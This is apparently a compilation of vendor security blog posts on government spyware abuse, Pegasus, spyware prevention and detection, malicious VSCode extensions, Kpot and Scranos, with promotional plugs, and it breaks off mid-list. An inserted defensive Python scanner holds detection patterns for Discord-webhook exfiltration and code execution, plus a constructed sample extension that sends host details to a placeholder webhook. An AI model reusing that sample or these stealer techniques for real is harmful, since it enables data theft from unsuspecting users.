Spyware Abuse in Serbia Raises Privacy Concerns


Serbia Accused of Using Spyware to Target Journalists and Activists

Recent revelations have brought to light troubling reports of excessive digital surveillance and spyware abuse in Serbia, raising significant concerns about privacy violations and the targeting of journalists, activists, and political opponents. According to findings from Amnesty International and several investigative reports, Serbian authorities have allegedly deployed spyware and digital extraction tools to illegally monitor individuals and compromise their devices.

These alarming discoveries highlight a growing global trend of weaponizing spyware to suppress dissent, a practice that not only undermines personal privacy but also erodes fundamental human rights.

How Serbian Authorities Weaponized Spyware

At the center of the controversy is the use of advanced spyware technologies, including tools provided by Israeli tech firms and digital forensic systems like Cellebrite. Amnesty International’s report details how Serbian authorities have allegedly used spyware to hack into mobile devices, extract sensitive data, and monitor the communications of journalists and civil rights activists without legal justification.

One particularly disturbing case involved a prominent journalist whose phone was forcibly unlocked using Cellebrite tools. After gaining access, authorities reportedly planted spyware onto the device, allowing them to monitor private conversations, calls, messages, and location data. Such tactics not only violate privacy laws but also present a chilling attempt to suppress free speech and discourage public scrutiny of government activities.

While Serbia’s government has denied wrongdoing, the evidence presented points to a systemic abuse of surveillance tools to target critics and political adversaries. For activists, journalists, and ordinary citizens, the implications are dire—these tools can operate silently, compromising devices and stealing data without the victim’s knowledge.

Spyware and Its Threat to Privacy

Spyware is malicious software designed to infiltrate devices, monitor user activity, and extract data. While some spyware is marketed as lawful technology for legitimate investigations, it is increasingly being misused by governments and organizations to track individuals. The Serbian case is a stark reminder of how powerful spyware can be exploited for political and personal agendas.

Spyware can:

  • Access private messages, emails, and call logs.
  • Track GPS locations in real-time.
  • Hijack device microphones and cameras to record audio or video.
  • Exfiltrate sensitive files, including photos and documents.

Such capabilities make spyware an effective but dangerous tool in the hands of those seeking to intimidate or control targeted individuals. Victims often remain unaware of the breach until it is too late.

For those concerned about privacy, employing reliable spyware removal tools is critical to safeguarding their devices. Detection and timely removal of spyware can prevent long-term surveillance and data theft.

The Broader Implications of Digital Surveillance

The abuse of spyware in Serbia fits into a larger, troubling pattern seen across the globe. Governments in multiple regions have been accused of acquiring spyware tools to monitor political opponents, suppress dissent, and control media narratives. From Pegasus spyware scandals to Cellebrite forensic tools, the line between lawful investigation and unlawful surveillance continues to blur.

In Serbia’s case, the use of spyware against journalists is particularly concerning, as it directly undermines press freedom—a cornerstone of democracy. When journalists are unable to operate without fear of surveillance, it creates a chilling effect that stifles investigative reporting and silences critical voices.

Furthermore, the ability to extract and manipulate data raises additional fears of evidence tampering, blackmail, or disinformation campaigns. Activists and civil society groups are now calling for stronger international regulations to govern the sale and use of spyware technologies.

Protecting Yourself from Spyware

With digital surveillance becoming more sophisticated, individuals must take proactive steps to secure their devices and personal data. While spyware often operates covertly, there are several warning signs to watch for, including unusual device behavior, unexpected battery drain, or excessive data usage.

To protect against spyware, users should:

  • Regularly update device software to patch security vulnerabilities.
  • Avoid clicking suspicious links or downloading unknown files.
  • Use trusted anti-spyware tools to scan and remove malicious software.
  • Enable encryption and strong authentication methods for added security.

For comprehensive protection, SUPERAntiSpyware offers robust tools to detect and remove spyware, ensuring your devices remain secure against invasive monitoring.

Safeguarding Privacy in a Surveillance Age

The revelations surrounding spyware abuse in Serbia serve as a wake-up call about the risks of unchecked digital surveillance. When powerful tools fall into the wrong hands, the consequences for privacy, freedom, and democracy can be severe.

As spyware continues to proliferate, individuals must remain vigilant and proactive in protecting their devices from intrusion. Governments, meanwhile, face increasing pressure to implement safeguards that prevent the misuse of surveillance technologies.

For those concerned about spyware threats, understanding how these tools work—and taking steps to remove them—is critical. In an age where privacy is under constant attack, empowering yourself with reliable spyware protection has never been more important.

Understanding Pegasus Spyware


What is Pegasus Spyware?

Many tech experts describe it as one of the most powerful pieces of spyware ever developed, but what is Pegasus spyware, and where did it come from? Pegasus is a sophisticated software capable of infiltrating smartphones and extracting vast amounts of sensitive information without the user’s knowledge. Its creators claim it was designed to combat crime and terrorism, but since its development its use for targeting journalists, activists and political figures has sparked global outrage from human rights groups such as Amnesty International.

Let’s take a look at its origins, its uses, and why the Pegasus spyware’s capabilities make it such a controversial piece of software.

Origins and development of Pegasus spyware

The earliest form of Pegasus spyware was identified in 2016. Here’s how it was created.

The NSO Group and its mission

The NSO Group, an Israeli cyber-arms company, developed Pegasus spyware in the early 2010s. The company markets itself as a provider of tools for governments and law enforcement agencies, claiming its technology is intended to fight crime, including anti-terrorism. According to the NSO Group, Pegasus was sold exclusively to vetted government clients under strict agreements to prevent misuse. Pegasus is the most famous NSO Group spyware, but not necessarily for the right reasons.

Initial deployment and intended use

Pegasus was initially deployed as a cutting-edge surveillance tool. Its capabilities allowed authorized agencies to intercept communications between suspects in an attempt to prevent criminal activity. Unlike traditional wiretapping, Pegasus was able to bypass encryption and access sensitive data directly from individuals’ devices, providing governments with unprecedented surveillance power. However, the Pegasus spyware capabilities soon raised concerns about the potential for abuse, with critics arguing that the spyware could easily be weaponized against dissidents and used to stifle free speech.

Technical capabilities of Pegasus spyware

Pegasus spyware is renowned for its sophisticated design and virtually undetectable operation. It can exploit vulnerabilities in both Android and iOS devices, granting attackers full access to a target’s smartphone and all of the information it holds.

Zero-click exploits

The standout feature of Pegasus is its use of zero-click exploits, which allow it to infect devices without any action from the target. Most forms of malware require the user to download a file or at least click a link in order to be installed on a device – but Pegasus is able to infiltrate a device via vulnerabilities in messaging apps, such as WhatsApp or iMessage.

Once deployed, Pegasus is extremely covert, leaving almost no traces on the infected device. It was initially thought that Pegasus left no evidence at all, but Amnesty International has publicly shared its methodology for detecting Pegasus on Android and iOS devices.

Data extraction and monitoring

Pegasus grants attackers nearly unlimited access to an infected device. Its capabilities include:

  • Accessing calls and messages, even those that have been encrypted, and being able to track communications across platforms.
  • Remotely activating microphones and cameras, effectively turning a smartphone into a surveillance device.
  • Monitoring GPS data to follow a target’s location in real time.
  • Harvesting any stored data, such as photos, videos, emails, contacts and browsing history.

Notable incidents involving Pegasus spyware

Pegasus has been linked to numerous high-profile incidents highlighting its misuse.

Surveillance of journalists and activists

In 2021, in an operation known as Project Pegasus, a months-long investigation led by dozens of news organizations revealed that Pegasus had been used to monitor journalists, activists, and human rights defenders worldwide. A list was uncovered of over 50,000 phone numbers potentially being targeted by Pegasus spyware. This widespread surveillance sparked understandable outrage among civil rights organizations, as it highlighted the ways in which Pegasus can be used as a tool to violate freedom of speech.

Political espionage allegations

As part of this report it was revealed that several world leaders were potentially being spied on through Pegasus spyware, including French President Emmanuel Macron and members of his government. This revelation and the political tension that followed underscored Pegasus’ ability to disrupt democratic processes and international relations.

Legal and ethical implications

As you can imagine, Pegasus has faced substantial legal scrutiny.

Legal action and investigations

There is currently an ongoing legal battle between the NSO Group and Meta over the NSO Group exploiting vulnerabilities in platforms such as WhatsApp to deploy the Pegasus spyware. The initial lawsuit was filed in October 2019, but details have come to light as recently as this year that suggest the Israeli authorities have seized documents in an attempt to frustrate the case and prevent the NSO Group’s activities from being revealed.

As of 2021, the NSO Group has been placed on a trade blacklist, restricting its ability to do business with US companies with regard to Pegasus or any other NSO Group spyware.

Human rights concerns

Pegasus raises profound ethical concerns. Human rights organizations argue that the spyware undermines fundamental freedoms such as privacy, free expression and the right to dissent. The ethical debate centers on whether such a powerful surveillance tool can ever be adequately regulated to prevent abuse. 

Protecting against advanced spyware threats

Pegasus is an example of a highly advanced form of spyware. While being able to protect against Pegasus spyware might seem like an intimidating task, there are steps individuals can take to reduce their risk of their devices being unknowingly infected. 

Regular software updates

Keeping your operating system and apps updated is one of the most effective defenses against all forms of malware. Security patches often address vulnerabilities that spyware, such as Pegasus, exploits. Enable automatic updates on your smartphone and computer to ensure you’re always protected.

Use of security tools

Make use of reputable antivirus or anti-spyware software to detect and block any potential threats before they have the chance to do harm. While advanced spyware such as Pegasus might be able to evade detection by the average Joe, basic protections will still be able to defend against the majority of cyber threats.

Awareness and vigilance

Be cautious of any suspicious messages, links or calls you receive, as phishing remains one of the most common methods of delivering spyware. Additionally, stay informed about emerging threats and best practices for device security. 

Clip spyware’s wings

While the average person might not have much to fear from Pegasus, it’s a chilling reminder of the potential dangers posed by advanced surveillance technology. While its origins may be rooted in a desire to fight crime, it’s easy to see how a tool such as Pegasus could be used in ways that challenge privacy and human rights.

To protect yourself from all forms of malware, expand your knowledge on the different forms that cyber threats can take, and reach out to experts such as the ones at SUPERAntiSpyware for tech support for safeguarding your digital life.

Effective Strategies to Prevent Spyware


How to Prevent Spyware

With the amount of mics, cameras, and keyboards we surround ourselves with on a daily basis, why wouldn’t you be interested in how to prevent spyware from turning your devices into reconnaissance tools? It’s one thing to joke about the FBI watching us through our webcams, it’s another to know that the presence of spyware could mean everything you type is being transmitted straight to an opportunistic cybercriminal. 

Spyware is capable of compromising your personal information, stealing sensitive data, and even remotely controlling your device. By arming yourself with the right knowledge and tools, you can protect yourself from the consequences of this particularly unsettling form of cyberattack. Enjoy spyware prevention tips straight from the experts at SUPERAntiSpyware.

Understanding spyware and its risks

You can’t protect against spyware without knowing what it is. Unlike many viruses, spyware isn’t necessarily destructive – it’s designed to be sneaky, operating in the background and going undetected while it collects your data. 

What is spyware?

Spyware is malicious software designed to infiltrate your device – be it a computer, smartphone, or other IoT products – monitor your activities and steal data without your knowledge or consent. It can record keystrokes, track your location through GPS, and gather sensitive information such as passwords, credit card details, and even private conversations. Once this data is collected, it’s often transmitted back to the cybercriminals behind the spyware, putting your privacy and security at risk. This data is occasionally sold on to third parties.

Common types of spyware

  • Adware – tracks your online activities to deliver targeted advertisements. While not always harmful, adware can degrade the performance of your device and serve as a gateway for more dangerous spyware.
  • Keyloggers – record your keystrokes to capture sensitive information such as login credentials and financial details.
  • Trojans – like the wooden horse from Greek mythology, trojan viruses often disguise themselves as legitimate software in order to gain access to your device. Once in place, they can then install spyware.
  • Cookies – while not inherently malicious, some cookies are used for extensive data collection, infringing on your privacy.
  • Monitoring software – can be installed without consent to track phone calls, messages, and even GPS locations.

Best practices for how to prevent spyware infections

Preventing any kind of virus requires a proactive approach to cybersecurity. Here are some spyware prevention tips to help ensure that cybercriminals don’t gain access to your sensitive data.

Install and maintain reputable anti-spyware software

The first line of defense against spyware is reliable security software. Comprehensive anti-spyware software such as ours can do everything from regularly clearing your cookies to identifying, blocking and alerting you to spyware before it even has the chance to infiltrate your computer.

Keep your operating systems and applications up to date

Updates can often be seen as time-consuming tasks that you want to put off for as long as possible, but they can be vital for maintaining security. Outdated software often contains vulnerabilities that cybercriminals can exploit in order to install spyware. Keeping your operating systems and apps up to date ensures you’re protected by the latest security patches. If you struggle with remembering to update them yourself, enable automatic updates.

Be cautious with email attachments and other downloads

Phishing emails are the most common delivery method for spyware and other forms of malware. It’s easy for emails to include malicious links designed to trick users into downloading spyware, and cybercriminals are becoming more adept at making these messages look legitimate. Be wary of any emails from an unknown sender, especially those urging you to open attachments or click on links. Email filters will send lots of phishing attempts to your spam folder, but some will always slip through – so stay vigilant.

Use pop-up blockers

Pop-ups can be more than just annoying – they’re often used to distribute spyware. Clicking on a malicious pop-up can initiate a download without your consent. Most browsers have built-in pop-up blockers, and most anti-spyware software will include this feature as well. 

Regularly review and manage your browser settings

Your browser can be like an open door for spyware if not properly configured. Regularly reviewing your browser settings can help to minimize the risks. Disable any unnecessary extensions, as these can sometimes carry spyware, and clear your cookies and browsing history regularly to prevent any unauthorized tracking.

Recognizing the signs of spyware infection

Even with the proper precautions to protect against spyware, it’s possible that something can slip through your security net. Knowing how to recognize an infection is critical to mitigating damage.

Decreased device performance

One of the earliest signs of spyware is a noticeable slowdown in your device’s performance. Spyware consumes resources, leading to lag and frequent crashes. Keep an eye out for your device becoming sluggish without an obvious cause – it’s possible spyware could be the culprit.

Pop-ups and browser redirects

Spyware often causes an influx of pop-ups, or redirects your browser to unfamiliar websites. This is a common tactic used by adware to generate revenue through clicks. If you have pop-ups appearing even when you’re not actively browsing, or your homepage seems to change without your consent or input, it might be down to spyware.

Increased data usage

Spyware will take the data it steals and transmit it back to its creators, which can result in unexplained spikes in your data usage. Monitor your monthly data usage through your device settings – this way, if there are any anomalies, you’ll be able to spot them.

Steps to take if you suspect a spyware infection

If you believe your device might be infected, take action as soon as you can.

Run a scan

Start by running a scan with your anti-spyware software of choice. Most modern security programs will detect and quarantine spyware automatically, but performing a full system scan can ensure that no malicious files are overlooked.

Update your software

Make sure that all of your software is up to date – this includes apps, your operating system and any security tools you use. This will ensure that you have the protection of all of the latest security patches. Continuing to run outdated software after a suspected infection can increase the likelihood of further attacks. 

Secure your accounts

If your device has been compromised it’s important to treat all of your accounts as having been put at risk. Change passwords for any critical accounts, such as your emails and any financial platforms, and enable two-factor authentication (2FA) where possible.

Shut down spies

Spyware might be persistent, but with vigilance, an understanding of how to prevent spyware from gaining access to your devices, and the right tools, you can protect your personal information. If you’re looking for software to keep your devices safe, consider our anti-spyware tool.

Mobile Spyware Detection Tips


How to Check Your Phone for Spyware

Would you know how to check your phone for spyware if you suspected you were being spied on? Smartphones are essential to our daily lives, serving as our wallets, calendars, communication hubs and vaults for personal information – but they’re often overlooked when it comes to understanding the risks of spyware and other malicious software. Our phones’ convenience is also what makes them prime targets for cybercriminals, and spyware – malicious software designed to spy on your activities – can easily turn your phone into a surveillance device, if given the chance.

In this blog we’ll cover how to detect spyware, how to remove spyware from smartphones, and other mobile security tips that can keep your phone (and everything you use it for) safe and secure.

Understanding spyware on mobile devices

It’s a common misconception that spyware only infects PCs and other desktop devices. While the built-in security in smartphones has gotten better and better over time, cybercriminals have also continued to develop more sophisticated ways of countering those defenses. 

What is spyware?

Spyware is a type of malicious software that secretly collects information from your device. It can monitor your calls, texts, browsing history, location, and even capture sensitive credentials such as your banking details and other passwords. Unlike some forms of malware, spyware is designed to operate discreetly, so that it can run in the background, unnoticed by the user, for as long as possible. This is one of the reasons why it’s so hard to detect spyware on phones and other devices.

There are various types of spyware, ranging from keyloggers to GPS tracking software. Some are tailored to target specific individuals, whereas others are used by organizations and governments for surveillance purposes. 

How does spyware infect smartphones?

Spyware can infiltrate smartphones in several ways:

  • Malicious apps, disguised as (or piggybacking on) legitimate apps or games, that infect your phone once installed.
  • Phishing links designed to lead the user to accidentally installing the malicious software.
  • Taking advantage of software vulnerabilities in outdated operating systems or apps.
  • Infecting devices through unsecured or public Wi-Fi networks.
  • Physical installation.

Understanding how spyware spreads is the first step to defending yourself from it. But how can you tell if your phone has already been compromised?

Signs that your phone may be infected with spyware

Spyware may be designed to operate covertly, but even the best spies have tells. Here are some of the ways to detect spyware on phones.

Unusual battery drain

Spyware constantly runs in the background, consuming your device’s resources such as CPU or GPS. This increased activity can sap your phone’s battery, and create a noticeable decrease in battery life. If you’ve noticed a change in the longevity of your phone’s battery life, it might be worth investigating further.

Increased data usage

Another red flag is unexplained spikes in your data usage. Spyware can transmit the data it steals back to its creator, but this requires significant bandwidth. Review your data usage regularly to spot any anomalies.

Slow performance and overheating

If your phone develops a habit of overheating, or is suddenly more sluggish than usual, spyware could be the cause. The constant background activity of malicious software puts a strain on hardware, leading to performance issues for your phone and frustration for you.

Strange behavior and notifications

Apps you don’t remember downloading, unexpected pop-ups, or texts from unknown sources could also indicate the presence of spyware. Similarly, if your phone makes unexplained calls, sends texts without your input, or experiences frequent crashes, it’s worth investigating further.

How to Check Your Phone for Spyware

If you suspect your phone might be compromised, follow these steps:

Review installed apps

Carefully examine your list of installed apps and their various permissions. Look for apps you don’t recognize or recall installing. Pay attention to apps with generic names, such as “System Update” or “Device Manager”. Research any suspicious apps you find online to see if they’ve been flagged by other users or cybersecurity experts.

Use safe mode

Booting your phone in safe mode disables third-party apps, making it easier to identify if a malicious app is causing the issue. For Android users, you can press and hold the power button until the Power Off option appears. Tap and hold Power Off, and the option for Safe Mode will appear.

Install security software

Comprehensive security software can detect and remove spyware, often identifying threats that are difficult to spot manually. Look for a reputable app from a trusted provider to scan your device – but avoid downloading free, unverified security apps that might be spyware in disguise.
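The "review installed apps" step above can be done systematically from a computer with the Android debug bridge. The script below is an added example for this post, not SUPERAntiSpyware's own tool: it parses text captured with `adb shell pm list packages -3` and `adb shell dumpsys package`, restricts itself to third-party apps (the same set safe mode disables), and flags packages that combine a system-sounding name with a cluster of surveillance-grade permissions. The two sample captures are constructed for the demo, and the line layout the parser expects is an assumption about typical dumpsys output.

```python
"""Flag third-party Android apps with spyware-like traits.

Added example for this post, not SUPERAntiSpyware's own code. PM_SAMPLE and
DUMPSYS_SAMPLE are constructed, and the dumpsys line layout the parser expects
is an assumption about typical output; check it against your own capture.
"""
import re

# Permissions that together let an app act as the "surveillance device" the post
# describes: microphone, camera, location, texts, call log, contacts.
SENSITIVE = {
    "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_SMS",
    "android.permission.READ_CALL_LOG",
    "android.permission.READ_CONTACTS",
}
# Package-name fragments that imitate system components ("System Update",
# "Device Manager"); a heuristic, so expect the occasional false positive.
GENERIC_WORDS = ("systemupdate", "devicemanager", "syncservice", "systemservice")


def third_party_packages(pm_output: str) -> set[str]:
    """Parse `pm list packages -3` lines of the form `package:<name>`."""
    return {line.split(":", 1)[1].strip()
            for line in pm_output.splitlines() if line.startswith("package:")}


def granted_permissions(dumpsys_output: str) -> dict[str, set[str]]:
    """Map each package to the permissions dumpsys reports as granted=true."""
    perms: dict[str, set[str]] = {}
    current = None
    for line in dumpsys_output.splitlines():
        header = re.match(r"\s*Package \[([\w.]+)\]", line)
        if header:
            current = perms.setdefault(header.group(1), set())
            continue
        grant = re.match(r"\s*([\w.]+): granted=true", line)
        if grant and current is not None:
            current.add(grant.group(1))
    return perms


def assess(pkg: str, granted: set[str]) -> list[str]:
    """Return reasons a package deserves a closer look; empty means nothing notable."""
    reasons = []
    if any(word in pkg.lower().replace(".", "") for word in GENERIC_WORDS):
        reasons.append("system-like package name")
    sensitive = sorted(granted & SENSITIVE)
    if len(sensitive) >= 2:
        short = ", ".join(p.rsplit(".", 1)[1] for p in sensitive)
        reasons.append("sensitive permissions: " + short)
    return reasons


def triage(pm_output: str, dumpsys_output: str) -> dict[str, list[str]]:
    """Assess only third-party apps, the same set that safe mode disables."""
    perms = granted_permissions(dumpsys_output)
    findings = {}
    for pkg in sorted(third_party_packages(pm_output)):
        reasons = assess(pkg, perms.get(pkg, set()))
        if reasons:
            findings[pkg] = reasons
    return findings


# Constructed sample captures (not from a real device).
PM_SAMPLE = """\
package:com.example.notes
package:com.system.update.service
"""
DUMPSYS_SAMPLE = """\
Packages:
  Package [com.example.notes] (a1b2c3):
    runtime permissions:
      android.permission.READ_EXTERNAL_STORAGE: granted=true, flags=[ USER_SET ]
  Package [com.system.update.service] (d4e5f6):
    runtime permissions:
      android.permission.RECORD_AUDIO: granted=true, flags=[ USER_SET ]
      android.permission.ACCESS_FINE_LOCATION: granted=true, flags=[ USER_SET ]
      android.permission.READ_SMS: granted=true, flags=[ USER_SET ]
      android.permission.CAMERA: granted=false, flags=[ USER_SET ]
  Package [com.android.settings] (777777):
    runtime permissions:
      android.permission.CAMERA: granted=true, flags=[ SYSTEM_FIXED ]
"""

if __name__ == "__main__":
    for pkg, why in triage(PM_SAMPLE, DUMPSYS_SAMPLE).items():
        print(pkg, "->", "; ".join(why))
```

A hit is a prompt to research the app, as the step above says, not a verdict; a pre-installed system app never appears because it is not in the `-3` listing.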

Steps to remove spyware from smartphones

If you’ve managed to confirm the presence of spyware, taking action as soon as possible is crucial. 

Uninstall suspicious apps

Remove any and all apps you’ve identified as being potential threats. Make sure that you’re fully uninstalling these apps, not just removing them from your homepage. After uninstalling, monitor your phone for signs of improvement in performance and behavior.

Perform a factory reset

If the spyware persists, or you haven’t been able to identify its origins, a factory reset is the most effective solution. This will restore your phone to its original settings, erasing all apps, data and malware. Back up any files you want to save, such as pictures and contact details, before proceeding.

Install security software

After removing suspicious apps or resetting your phone, install a trusted security app to safeguard it against future threats. Choose software with real-time threat detection, regular updates, and robust privacy protections. And, for good measure, carry out a scan on your phone as soon as it’s installed to make sure you haven’t missed any potential threats.

Don’t let spies crack your smartphone safe

Your smartphone is a treasure trove of personal information, and keeping it secure should always be a top priority. Spyware is a hidden threat that can compromise your privacy, steal sensitive data, and disrupt your device’s performance. By understanding the risks, learning how to recognize the warning signs, and taking proactive steps, you can protect yourself from spyware and other cyber threats. 

While you’re busy protecting your phone, you can trust SUPERAntiSpyware to protect your PC. For more PC and mobile security tips take a look at our resources.

Malicious Microsoft VSCode extensions steal passwords, open remote shells

*Content borrowed from bleepingcomputer.com.

Cybercriminals are starting to target Microsoft’s VSCode Marketplace, uploading three malicious Visual Studio extensions that Windows developers downloaded 46,600 times.

According to Check Point, whose analysts discovered the malicious extensions and reported them to Microsoft, the malware enabled the threat actors to steal credentials, system information, and establish a remote shell on the victim’s machine.

The extensions were discovered and reported on May 4, 2023, and they were subsequently removed from the VSCode marketplace on May 14, 2023.

However, any software developers still using the malicious extensions must manually remove them from their systems and run a complete scan to detect any remnants of the infection.

Malicious cases on the VSCode Marketplace

Visual Studio Code (VSC) is a source-code editor published by Microsoft and used by a significant percentage of professional software developers worldwide.

Microsoft also operates an extensions market for the IDE called the VSCode Marketplace, which offers over 50,000 add-ons that extend the application’s functionality and provide more customization options.

The malicious extensions discovered by Check Point researchers are the following:

‘Theme Darcula dark’ – Described as “an attempt to improve Dracula colors consistency on VS Code,” this extension was used to steal basic information about the developer’s system, including hostname, operating system, CPU platform, total memory, and information about the CPU.

While the extension did not contain other malicious activity, it is not typical behavior associated with a theme pack.

This extension had the most circulation by far, downloaded over 45,000 times.

Darcula extension on the VSCode Marketplace (Check Point)

‘python-vscode’ – This extension was downloaded 1,384 times despite its empty description and uploader name of ‘testUseracc1111,’ showcasing that having a good name is enough to garner some interest. 

Analysis of its code showed that it is a C# shell injector that can execute code or commands on the victim’s machine.

Obfuscated C# code injector (Check Point)

‘prettiest java’ – Based on the extension’s name and description, it was likely created to mimic the popular ‘prettier-java‘ code formatting tool.

In reality, it stole saved credentials or authentication tokens from Discord and Discord Canary, Google Chrome, Opera, Brave Browser, and Yandex Browser, which were then sent to the attackers over a Discord webhook.

The extension has had 278 installations.

Searching for local secrets (Check Point)

Check Point also found multiple suspicious extensions, which could not be characterized as malicious with certainty, but demonstrated unsafe behavior, such as fetching code from private repositories or downloading files.

Software repositories come with risk

Software repositories allowing user contributions, such as NPM and PyPI, have proven time and time again to be risky to use as they have become a popular target for threat actors.

While VSCode Marketplace is just starting to be targeted, AquaSec demonstrated in January that it was fairly easy to upload malicious extensions to the VSCode Marketplace and presented some highly suspicious cases. However, they were not able to find any malware.

The cases discovered by Check Point demonstrate that threat actors are now actively attempting to infect Windows developers with malicious submissions, precisely as they do in other software repositories such as NPM and PyPI.

Users of the VSCode Marketplace, and all user-supported repositories, are advised to only install extensions from trusted publishers with many downloads and community ratings, read user reviews, and always inspect the extension’s source code before installing it.
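Inspecting an extension's source before trusting it can be partly automated. The script below is an added example for this article, not Check Point's or Microsoft's tooling: it walks a VS Code extensions folder (assumed layout `<dir>/<publisher.name-version>/package.json` plus the JavaScript the extension ships) and reports extensions whose code matches the behaviours described above, such as a colour theme that fingerprints the host, shell or process spawning, runtime code evaluation, and posting to a Discord webhook. `build_demo()` writes a constructed sample set so it runs offline.

```python
"""Static triage of a VS Code extensions folder for the behaviours described above.

Added example, not Check Point's or Microsoft's tooling. The directory layout
and the sample extensions written by build_demo() are assumptions/constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# (label, regex) pairs; a hit is a prompt for manual review, not proof of malice.
INDICATORS = [
    ("discord-webhook", re.compile(r"discord(?:app)?\.com/api/webhooks", re.I)),
    ("process-spawn", re.compile(r"child_process|\bexecSync\(|\bspawn\(")),
    ("host-fingerprint", re.compile(r"\bos\.(?:hostname|cpus|totalmem|platform|arch)\(")),
    ("dynamic-eval", re.compile(r"\beval\(|new Function\(")),
]


def scan_source(text: str) -> list[str]:
    """Return the indicator labels that fire on one JavaScript source."""
    return [label for label, rx in INDICATORS if rx.search(text)]


def audit_extension(ext_dir: Path) -> dict:
    """Read package.json and scan every shipped .js file."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    hits = {}
    for js in sorted(ext_dir.rglob("*.js")):
        labels = scan_source(js.read_text(encoding="utf-8", errors="replace"))
        if labels:
            hits[js.relative_to(ext_dir).as_posix()] = labels
    return {
        "id": f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}",
        "declares_theme": "themes" in manifest.get("contributes", {}),
        "hits": hits,
    }


def suspicious(report: dict) -> list[str]:
    """Turn raw hits into reasons; an empty list means nothing worth a closer look."""
    labels = {lab for labs in report["hits"].values() for lab in labs}
    reasons = []
    if report["declares_theme"] and labels:
        # A colour theme needs no executable code at all (cf. 'Theme Darcula dark').
        reasons.append("theme pack runs code: " + ", ".join(sorted(labels)))
    if "discord-webhook" in labels:
        reasons.append("posts to a Discord webhook, the exfiltration channel seen above")
    if len(labels & {"process-spawn", "dynamic-eval", "host-fingerprint"}) >= 2:
        reasons.append("combines host fingerprinting with command/code execution")
    return reasons


def audit_directory(root: Path) -> dict[str, list[str]]:
    """Map extension id -> reasons for every extension that looks suspicious."""
    findings = {}
    for ext_dir in sorted(p for p in root.iterdir() if (p / "package.json").is_file()):
        report = audit_extension(ext_dir)
        reasons = suspicious(report)
        if reasons:
            findings[report["id"]] = reasons
    return findings


def build_demo() -> Path:
    """Write a constructed folder: a clean theme, a formatter that legitimately
    spawns a process, and a 'theme' that fingerprints the host and posts the
    result to a webhook (modelled on the behaviour described in the article)."""
    root = Path(tempfile.mkdtemp(prefix="vsix-audit-"))
    samples = {
        "good.clean-theme-1.0.0": ({"publisher": "good", "name": "clean-theme",
                                    "contributes": {"themes": [{"label": "Clean"}]}}, None),
        "good.formatter-2.1.0": ({"publisher": "good", "name": "formatter", "main": "./extension.js"},
                                 "const cp = require('child_process');\n"
                                 "exports.activate = () => cp.execSync('java -version');\n"),
        "bad.theme-dark-0.0.1": ({"publisher": "bad", "name": "theme-dark", "main": "./extension.js",
                                  "contributes": {"themes": [{"label": "Dark"}]}},
                                 "const os = require('os');\n"
                                 "const info = {h: os.hostname(), c: os.cpus(), m: os.totalmem()};\n"
                                 "fetch('https://discord.com/api/webhooks/EXAMPLE/TOKEN', "
                                 "{method: 'POST', body: JSON.stringify(info)});\n"),
    }
    for folder, (manifest, js) in samples.items():
        d = root / folder
        d.mkdir()
        (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        if js is not None:
            (d / "extension.js").write_text(js, encoding="utf-8")
    return root


if __name__ == "__main__":
    for ext_id, why in audit_directory(build_demo()).items():
        print(ext_id, "->", "; ".join(why))
```

Point `audit_directory()` at your real `~/.vscode/extensions` to review what is already installed; heavily obfuscated code (as in the 'python-vscode' case) may defeat plain pattern matching, so treat a clean result as one input among several, not a guarantee.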


Kpot, The info stealer

Kpot, an older information stealer, has just received a major update and is being seen in the wild again. This time Kpot brings zero persistence (meaning it is never written to your disk); instead it carries out all of its attacks in memory before leaving your computer completely, which removes the ability to detect it without real-time protection.

How it works

Kpot is delivered mainly through malicious email attachments. When opened, the document asks the user to click “Enable Editing” and appears to be unreadable until they do so; clicking it, however, gives the attacker full access to the computer. Once this attack vector has been used, Kpot gets to work extracting as much as it can. First, it sends a message to its C&C server and asks what it should do. The reply can include many possible commands, and the set can be updated over time; at the time of this writing it includes the following.

Browsers (Chrome, Mozilla, Internet Explorer): cookies, passwords, Autofill data, and history are taken and sent back to the C&C server.

Crypto: various cryptocurrency files. Depending on what the wallet software stores on the computer, these can reveal a great deal of information regarding credentials, emails, and wallets.

Discord: A chat interface advertised mainly to gamers: chat history, and user information can be stolen from files on the computer.

Battlenet: A game portal for World of Warcraft, StarCraft, and Diablo, among others. Account information can be stolen this way, leading to compromised accounts unless further fail-safes such as 2-factor authentication are in place.

Screenshots: Kpot can take pictures of what you are currently doing. This could be done when it recognizes open bank windows or other compromising information that may not be stored on your computer but are visible on the screen.

Windows credentials: Kpot can steal your Windows account information, such as username and password.

Grabber: A more advanced version of the grabber Qulab uses. Kpot uses it to find any files that may contain information but are not tied to a particular application, for example a “passwords.txt” on the computer. Note that it does not focus on the file name and instead takes any file with certain extensions, such as txt, pdf, and doc, to name a few.

Delete: Kpot uses this command to delete itself from the computer and any other evidence it might have been there.

Who is affected?

One of the scary things about Kpot is that it is very affordable on the dark web. Coming in at only $100, with support optional, it no longer takes a master hacker to obtain an information stealer that can then be used in a variety of ways. It could be slipped into downloads from illegitimate sources or used in malspam campaigns.

Indicators of Compromise

What you can do


If you or someone you know is infected with Kpot malware, download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required. SUPERAntiSpyware is easy to install and will detect and remove Kpot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID. Click here: https://www.superantispyware.com/technician-download.html

https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal

New cross platform rootkit: Scranos

Scranos is a new player to the global malware scene that leverages many well-known and some new methods to obtain login credentials and bank information. It can also steal or manipulate information from several online accounts to access your Amazon, Airbnb, Facebook, Steam, and YouTube accounts.

How it works

Scranos is installed through various methods, including:

  • cracked software
  • pirated videos and movies
  • legal alternative software such as e-book readers, video players, driver updaters, and fake antimalware products

When installed, Scranos installs a rootkit driver that ensures it remains on the computer unless removed by a legitimate antivirus program.

Once Scranos has gained persistence, it injects a downloader into another running process so that it can fetch further functionality. When it is done, Scranos removes all downloaded content from the computer to make it easier to keep itself hidden.

Among the functionality that Scranos downloads is a YouTube module. This module launches Chrome (and installs it if it’s not already installed), goes to YouTube, mutes it, and subscribes to channels that the attackers use to earn money. Other methods Scranos uses to gain information include:

